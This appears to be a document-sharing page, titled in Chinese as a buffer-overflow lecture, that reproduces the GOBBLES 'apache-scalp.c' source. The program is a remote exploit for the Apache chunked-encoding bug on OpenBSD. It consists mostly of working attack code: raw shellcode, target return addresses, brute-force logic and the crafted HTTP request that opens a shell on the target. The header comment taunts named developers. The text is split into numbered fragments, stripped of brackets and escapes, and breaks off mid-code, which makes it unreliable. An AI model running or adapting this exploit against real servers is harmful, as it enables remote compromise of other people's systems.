緩沖溢出講座12

1、/* * apache-scalp.c* OPENBSD/X86 APACHE REMOTE EXPLOIT!* ROBUST, RELIABLE, USER-FRIENDL Y MOTHERFUCKING 0DAY W AREZ!* BLING! BLING! - BRUTE FORCE CAPABILITIES - BLING! BLING!* ". . . and Doug Sniff said it was a hole in Epic."* Disarm you with a smile* And leave you like they left me here*

2、 To wither in denial* The bitterness of one who's left alone* Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to* the OpenBSD developers (Theo, DugSong, jnathan, *#!w00w00, .) and* their crappy memcpy implementation that makes this 32-bit impossibility* very easy

3、to accomplish. This vulnerability was recently rediscovered by a slew* of researchers.* The "experts" have already concurred that this bug.* - Can not be exploited on 32-bit *nix variants* - Is only exploitable on win32 platforms* - Is only exploitable on certain 64-bit systems* However, c

4、ontrary to what ISS would have you believe, we have* successfully exploited this hole on the following operating systems:* Sun Solaris 6-8 (sparc/x86)* FreeBSD 4.3-4.5 (x86)* OpenBSD 2.6-3.1 (x86)* Linux (GNU) 2.4 (x86)* Don't get discouraged too quickly in your own research. It took us close* t

5、o two months to be able to exploit each of the above operating systems.* There is a peculiarity to be found for each operating system that makes the* exploitation possible.* Don't email us asking for technical help or begging for warez. We are* busy working on many other wonderful things, includ

6、ing other remotely* exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform* the community that those holes don't exist? We wonder who's paying her.* This code is an early version from when we first began researching the* vulnerability. It should spawn a shell on any unpatc

7、hed OpenBSD system* running the Apache webserver.* We appreciate The Blue Boar's effort to allow us to post to his mailing* list once again. Because he finally allowed us to post, we now have this* very humble offering.* This is a very serious vulnerability. After disclosing this exploit, we* ho

8、pe to have gained immense fame and glory.* Testbeds: , , * Abusing the right syscalls, any exploit against OpenBSD = root. Kernel* bugs are great.* #!GOBBLES QUOTES* - you just know 28923034839303 admins out there running* OpenBSD/Apache are going "ugh.not exploitable.ill do it after

9、the* weekend"* - "Five years without a remote hole in the default install". default* package = kernel. if theo knew that talkd was exploitable, he'd cry.* - so funny how claims it's impossible to exploit this.* - how many times were we told, "ANTISEC IS NOT FOR

10、 YOU" ?* - I hope Theo doesn't kill himself* - heh, this is a middle finger to all those open source, anti-"m$"* idiots. slashdot hippies.* - they rushed to release this exploit so they could update their ISS* scanner to have a module for this vulnerability, but it doesnt even* wo

11、rk. it's just looking for win32 apache versions* - no one took us seriously when we mentioned this last year. we warned* them that moderation = no pie.* - now try it against synnergy :>* - ANOTHER BUG BITE THE DUST. VROOOOM VRRRRRRROOOOOOOOOM* xxxx this thing is a major exploit. do you really

12、 wanna publish it?* oooo i'm not afraid of whitehats* xxxx the blackhats will kill you for posting that exploit* oooo blackhats are a myth* oooo so i'm not worried* oooo i've never seen one* oooo i guess it's sort of like having god in your life* oooo i don't believe there's

13、a god* oooo but if i sat down and met him* oooo i wouldn't walk away thinking* oooo "that was one hell of a special effect"* oooo so i suppose there very well could be a blackhat somewhere* oooo but i doubt it. i've seen whitehat-blackhats with their ethics* and deep philosophy.* G

14、OBBLES POSERS/WANNABES* - #!GOBBLESEFNET (none of us join here, but we've sniffed it)* - superGOBBLES.NET (low-)* GOBBLES Security* GOBBLES* */#include#include#include#include#include#include#include#include#include#include#include#define EXPLOIT_TIMEOUT 5 /* num seconds to

15、wait before assuming it failed */#define RET_ADDR_INC 512#define MEMCPY_s1_OW ADDR_DELTA -146#define PADSIZE_1 4#define PADSIZE_2 5#define PADSIZE_3 7#define REP_POPULATOR 24#define REP_RET_ADDR 6#define REP_ZERO 36#define REP_SHELLCODE 24#define NOPCOUNT 1024#define NOP 0x41#define PADDING_1 'A

16、'#define PADDING_2 'B'#define PADDING_3 'C'#define PUT_STRING(s) memcpy(p, s, strlen(s); p += strlen(s);#define PUT_BYTES(n, b) memset(p, b, n); p += n;#define SHELLCODE_LOCALPORT_OFF 30char shellcode ="x89xe2x83xecx10x6ax10x54x52x6ax00x6ax00xb8x1f" "x00x00x00xcdx8

17、0x80x7ax01x02x75x0bx66x81x7ax02""x42x41x75x03xebx0fx90xffx44x24x04x81x7cx24x04""x00x01x00x00x75xdaxc7x44x24x08x00x00x00x00xb8""x5ax00x00x00xcdx80xffx44x24x08x83x7cx24x08x03""x75xeex68x0bx6fx6bx0bx81x34x24x01x00x00x01x89""xe2x6ax04x52x6ax01x6ax00xb8x0

18、4x00x00x00xcdx80""x68x2fx73x68x00x68x2fx62x69x6ex89xe2x31xc0x50""x52x89xe1x50x51x52x50xb8x3bx00x00x00xcdx80xcc"struct char *type;u_long retaddr; targets = / hehe, yes theo, that say OpenBSD here! "OpenBSD 3.0 x86 / Apache 1.3.20", 0xcf92f , "OpenBSD 3.0 x86 /

19、Apache 1.3.22", 0x8f0aa , "OpenBSD 3.0 x86 / Apache 1.3.24", 0x90600 , "OpenBSD 3.1 x86 / Apache 1.3.20", 0x8f2a6 , "OpenBSD 3.1 x86 / Apache 1.3.23", 0x90600 , "OpenBSD 3.1 x86 / Apache 1.3.24", 0x9011a , "OpenBSD 3.1 x86 / Apache 1.3.24 #2", 0

20、x932ae , ;int main(int argc, char *argv) char *hostp, *portp; unsigned char buf512, *expbuf, *p; int i, j, lport;int sock;int bruteforce, owned, progress;u_long retaddr;struct sockaddr_in sin, from;if(argc != 3) printf("Usage: %s <target#|base address> <ip:port>n", argv0); prin

21、tf(" Using targets:t./apache-scalp 3 :8080n");printf(" Using bruteforce:t./apache-scalp 0x8f000 :8080n"); printf("n- - - Potential targets list - - n");printf("Target ID / Target specificationn"); for(i = 0; i < sizeof(targets)/8; i+) prin

22、tf("t%d / %sn", i, targetsi.type);return -1; hostp = strtok(argv2, ":"); if(portp = strtok(NULL, ":") = NULL) portp = "80"retaddr = strtoul(argv1, NULL, 16); if(retaddr < sizeof(targets)/8) retaddr = targetsretaddr.retaddr; bruteforce = 0;else bruteforce =

23、1;srand(getpid(); signal(SIGPIPE, SIG_IGN); for(owned = 0, progress = 0;retaddr += RET_ADDR_INC) /* skip invalid return adresses */ i = retaddr & 0xff;if(i = 0x0a | i = 0x0d) retaddr+;else if(memchr(&retaddr, 0x0a, 4) | memchr(&retaddr, 0x0d, 4) continue;sock = socket(AF_INET, SOCK_STREA

24、M, 0); sin.sin_family = AF_INET;sin.sin_addr.s_addr = inet_addr(hostp); sin.sin_port = htons(atoi(portp);if(!progress)printf("n* Connecting. ");fflush(stdout);if(connect(sock, (struct sockaddr *) & sin, sizeof(sin) != 0) perror("connect()");exit(1);if(!progress) printf("

25、connected!n");/* Setup the local port in our shellcode */i = sizeof(from);if(getsockname(sock, (struct sockaddr *) & from, &i) != 0) perror("getsockname()");exit(1);lport = ntohs(from.sin_port); shellcodeSHELLCODE_LOCALPORT_OFF + 1 = lport & 0xff; shellcodeSHELLCODE_LOCALP

26、ORT_OFF + 0 = (lport >> 8) & 0xff;p = expbuf = malloc(8192 + (PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE) + (PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR);PUT_STRING("GET / HTTP/1.1rnHost: apache-scalp.crn");for (i = 0; i < REP_SHELLCODE; i+) PUT_STRING(

27、"X-");PUT_BYTES(PADSIZE_3, PADDING_3); PUT_STRING(": ");PUT_BYTES(NOPCOUNT, NOP); memcpy(p, shellcode, sizeof(shellcode) - 1);p += sizeof(shellcode) - 1;PUT_STRING("rn");for (i = 0; i < REP_POPULATOR; i+) PUT_STRING("X-");PUT_BYTES(PADSIZE_1, PADDING_1);PUT

28、_STRING(": ");for (j = 0; j < REP_RET_ADDR; j+) *p+ = retaddr & 0xff;*p+ = (retaddr >> 8) & 0xff;*p+ = (retaddr >> 16) & 0xff;*p+ = (retaddr >> 24) & 0xff;PUT_BYTES(REP_ZERO, 0);PUT_STRING("rn"); PUT_STRING("Transfer-Encoding: chunkedrn&q

29、uot;); snprintf(buf, sizeof(buf) - 1, "rn%xrn", PADSIZE_2); PUT_STRING(buf);PUT_BYTES(PADSIZE_2, PADDING_2);snprintf(buf, sizeof(buf) - 1, "rn%xrn", MEMCPY_s1_OW ADDR_DELTA); PUT_STRING(buf);write(sock, expbuf, p - expbuf);progress+; if(progress%70) = 0) progress = 1;if(progress = 1) memset(buf, 0, sizeof(buf);sprintf(buf, "r* Currently using retaddr 0lx, length %u, localport %u", retaddr, (unsigned int)(p - expbuf), lport);memset(buf + strlen(buf), ' ', 74 - strlen(buf); puts(buf);if(bruteforce) putch